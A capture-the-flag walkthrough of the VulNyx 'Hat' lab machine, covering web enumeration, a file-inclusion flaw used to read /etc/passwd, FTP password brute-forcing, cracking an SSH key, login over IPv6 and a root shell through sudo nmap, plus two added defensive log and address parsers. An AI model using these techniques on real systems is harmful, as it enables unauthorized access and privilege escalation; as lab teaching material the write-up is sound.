🟠 NYX - Hat
#vulnyx
#nyx
#linux
#lfi
#ipv6
#ftp (bruteforce)
#id_rsa (crack)
#nmap (sudo)
June 16, 2023 by Miguel R. (d4t4s3c)
Information
Hat is a Linux machine from the VulNyx platform; it has a medium difficulty level and was created by the user d4t4s3c.
- Initial access: a file found on the website reveals a username; with that username the FTP password is brute-forced, and once logged in a private key (id_rsa) is found that allows SSH access over IPv6, since the port is closed over IPv4.
- Privilege escalation: the user has sudo rights on a binary that allows becoming root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 12:59 CET
Nmap scan report for 192.168.1.37
Host is up (0.000055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
65535/tcp open unknown
❯ nmap -sVC -p80,65535 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 13:02 CET
Nmap scan report for 192.168.1.37
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
65535/tcp open ftp pyftpdlib 1.5.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.37:65535
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
Shell (cromiphi)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.37/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/logs (Status: 301) [Size: 311] [--> http://192.168.1.37/logs/]
/php-scripts (Status: 301) [Size: 318] [--> http://192.168.1.37/php-scripts/]
/server-status (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
/logs
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.37/logs/ -x log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/logs/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: log
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/vsftpd.log (Status: 200) [Size: 1760]
Progress: 441092 / 441094 (100.00%)
===============================================================
Finished
===============================================================
/php-scripts
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.37/php-scripts/ -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/php-scripts/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/file.php (Status: 200) [Size: 0]
/.php (Status: 403) [Size: 277]
Progress: 441092 / 441094 (100.00%)
===============================================================
Finished
===============================================================
Reviewing the contents of the vsftpd.log file, I enumerate the user admin_ftp.
❯ curl -sX GET 'http://192.168.1.37/logs/vsftpd.log'
[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:43:57] concurrency model: async
[I 2021-09-28 18:43:57] masquerade (NAT) address: None
[I 2021-09-28 18:43:57] passive ports: None
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect).
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
[I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).
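The log above is exactly the kind of artifact a defender watches for: a burst of failed USER attempts from one source followed by a successful login. As an added example (not part of the original write-up), this Python parser extracts login events from pyftpdlib-style lines and flags that spray-then-success pattern; the sample lines are constructed from the log shown above and the alert threshold is an assumed value.

```python
import re
from collections import defaultdict

# Matches the login-related lines pyftpdlib writes, e.g.
#   [I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
#   [I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
LOGIN_RE = re.compile(
    r"^\[(?P<level>\w) (?P<ts>\S+ \S+)\] (?P<ip>[\d.]+):(?P<port>\d+)-\[[^\]]*\] "
    r"USER '(?P<user>[^']*)' (?P<result>failed login|logged in)\.$"
)

# Constructed sample modelled on the vsftpd.log served by the target (a subset, not the full file).
SAMPLE_LOG = """\
[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
"""


def parse_logins(text):
    """Yield (timestamp, source_ip, username, success) for every login attempt."""
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            yield m["ts"], m["ip"], m["user"], m["result"] == "logged in"


def audit(text, threshold=3):
    """Per source IP: usernames that failed, usernames that logged in, and an alert
    whenever a success follows at least `threshold` failures from the same IP."""
    failed = defaultdict(list)
    success = defaultdict(list)
    alerts = []
    for ts, ip, user, ok in parse_logins(text):
        if not ok:
            failed[ip].append(user)
            continue
        success[ip].append(user)
        prior = len(failed.get(ip, []))  # .get() avoids creating an empty entry
        if prior >= threshold:
            alerts.append(f"{ts} {ip}: '{user}' logged in after {prior} failed attempts")
    return {"failed": dict(failed), "success": dict(success), "alerts": alerts}
```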
Local File Inclusion (LFI)
I check the file.php script located under /php-scripts.
Parameter Brute Force
Through brute force I discover the vulnerable parameter, named 6.
❯ wfuzz -c -w /opt/common.txt -u 'http://192.168.1.37/php-scripts/file.php?FUZZ=/etc/passwd' --hh=0 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.37/php-scripts/file.php?FUZZ=/etc/passwd
Total requests: 4727
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000185: 200 26 L 38 W 1404 Ch "6"
Total time: 2.737478
Processed Requests: 4727
Filtered Requests: 4726
Requests/sec.: 1726.771
From the /etc/passwd file I enumerate the users cromiphi and root.
❯ curl -sX GET "http://192.168.1.37/php-scripts/file.php?6=/etc/passwd" |grep "sh$"
root:x:0:0:root:/root:/bin/bash
cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash
IPv6
I obtain the IPv6 address by pointing the inclusion at /proc/net/if_inet6, since port 22 is in the filtered state and the address may be useful for later attacks.
❯ curl -sX GET "http://192.168.1.37/php-scripts/file.php?6=/proc/net/if_inet6"
00000000000000000000000000000001 01 80 10 80 lo
fe800000000000000a0027fffe69bdca 02 40 20 80 enp0s3
I convert the IPv6 address to the proper format.
❯ curl -sX GET "http://192.168.1.37/php-scripts/file.php?6=/proc/net/if_inet6" |awk 'NR==2 {print $1}' | fold -w4 | paste -sd ":"
fe80:0000:0000:0000:0a00:27ff:fe69:bdca
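The awk/fold/paste pipeline above rebuilds the address by hand. As an added example (not from the original write-up), this Python snippet parses the full /proc/net/if_inet6 format (address, interface index, prefix length, scope, flags, device) with the standard ipaddress module and appends the zone id that a link-local address needs, which is why the ssh command later in the write-up uses %eth0; the sample lines are constructed from the output above.

```python
import ipaddress

# Kernel scope codes found in the fourth column of /proc/net/if_inet6.
SCOPES = {0x00: "global", 0x10: "host", 0x20: "link", 0x40: "site"}

# Constructed sample in the format of the /proc/net/if_inet6 read through the LFI above.
SAMPLE_IF_INET6 = """\
00000000000000000000000000000001 01 80 10 80 lo
fe800000000000000a0027fffe69bdca 02 40 20 80 enp0s3
"""


def parse_if_inet6(text):
    """Turn /proc/net/if_inet6 lines into records with a proper IPv6 address.

    Columns: 32-hex address, ifindex, prefix length, scope, flags, device name.
    """
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip blank or malformed lines
        raw, ifindex, plen, scope, flags, dev = fields
        addr = ipaddress.IPv6Address(bytes.fromhex(raw))  # 16 packed bytes
        records.append({
            "address": str(addr),       # compressed, e.g. fe80::a00:27ff:fe69:bdca
            "exploded": addr.exploded,  # fe80:0000:...:bdca, the form used with nmap above
            "ifindex": int(ifindex, 16),
            "prefixlen": int(plen, 16),
            "scope": SCOPES.get(int(scope, 16), "unknown"),
            "flags": int(flags, 16),
            "device": dev,
            "link_local": addr.is_link_local,
        })
    return records


def with_zone(record, local_iface):
    """Link-local (fe80::/10) addresses are only meaningful per interface, so a client
    must add a zone id (%iface) to reach them; other scopes are used as-is."""
    host = record["address"]
    return f"{host}%{local_iface}" if record["link_local"] else host
```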
65535/TCP (FTP)
Password Brute Force
Having the username admin_ftp, I brute-force the FTP password and succeed with the credentials admin_ftp:cowboy.
❯ hydra -t 64 -l admin_ftp -P /opt/techyou.txt ftp://192.168.1.37:65535 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-02 13:50:01
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~157 tries per task
[DATA] attacking ftp://192.168.1.37:65535/
[65535][ftp] host: 192.168.1.37 login: admin_ftp password: cowboy
[STATUS] attack finished for 192.168.1.37 (valid pair found)
I log in to the FTP server with the obtained credentials and download all the available files.
❯ lftp -u 'admin_ftp,cowboy' 192.168.1.37 -p 65535
lftp admin_ftp@192.168.1.37:~> ls
drwxrwxrwx 2 cromiphi cromiphi 4096 Sep 28 2021 share
lftp admin_ftp@192.168.1.37:/> cd share
lftp admin_ftp@192.168.1.37:/share> ls
-rwxrwxrwx 1 cromiphi cromiphi 1751 Sep 28 2021 id_rsa
-rwxrwxrwx 1 cromiphi cromiphi 108 Sep 28 2021 note
lftp admin_ftp@192.168.1.37:/share> mget *
1859 bytes transferred
Total 2 files transferred
The note file mentions that some critical protocols have been secured.
❯ cat note
Hi,
We have successfully secured some of our most critical protocols ... no more worrying!
Sysadmin
The id_rsa file, as expected, is an SSH private key, and it is protected by a password.
❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,6F30B7B22B088AB2
[...]
-----END RSA PRIVATE KEY-----
22/TCP (SSH)
id_rsa (Cracking)
I obtain the password ilovemyself with RSAcrack.
❯ RSAcrack -k id_rsa -w /opt/techyou.txt
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: VulNyx™ ver: v1.0.0
─────────────────────────────
[i] Cracking | id_rsa
[i] Wordlist | /opt/techyou.txt
[*] Status | 1594/10000/15%/ilovemyself
[+] Password | ilovemyself
─────────────────────────────
As can be seen, port 22 is filtered over IPv4 and open over IPv6.
❯ nmap -p22 192.168.1.37 | grep "tcp"
22/tcp filtered ssh
❯ nmap -6 -p22 fe80:0000:0000:0000:0a00:27ff:fe69:bdca | grep "tcp"
22/tcp open ssh
I access the system as the user cromiphi over IPv6 with the id_rsa key.
❯ ssh -i id_rsa -6 cromiphi@'fe80:0000:0000:0000:0a00:27ff:fe69:bdca%eth0'
Enter passphrase for key 'id_rsa':
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
cromiphi@hat:~$ id ; hostname
uid=1000(cromiphi) gid=1000(cromiphi) grupos=1000(cromiphi)
hat
Privilege Escalation
The user cromiphi can run the nmap binary as root with sudo.
cromiphi@hat:~$ sudo -l
Matching Defaults entries for cromiphi on hat:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cromiphi may run the following commands on hat:
(root) NOPASSWD: /usr/bin/nmap
GTFOBins provides the one-liner with the shell-escape sequence, and I become root.
cromiphi@hat:~$ echo -n 'os.execute("/bin/sh")' > /dev/shm/root.nse
cromiphi@hat:~$ sudo -u root /usr/bin/nmap --script=/dev/shm/root.nse
# bash -i
root@hat:~i# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
hat
Flags
Now as root, I can read the user.txt and root.txt flags.
root@hat:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
d3ea66f*************************
8b4acc3*************************
That concludes the write-up of the Hat machine.
Happy Hacking!
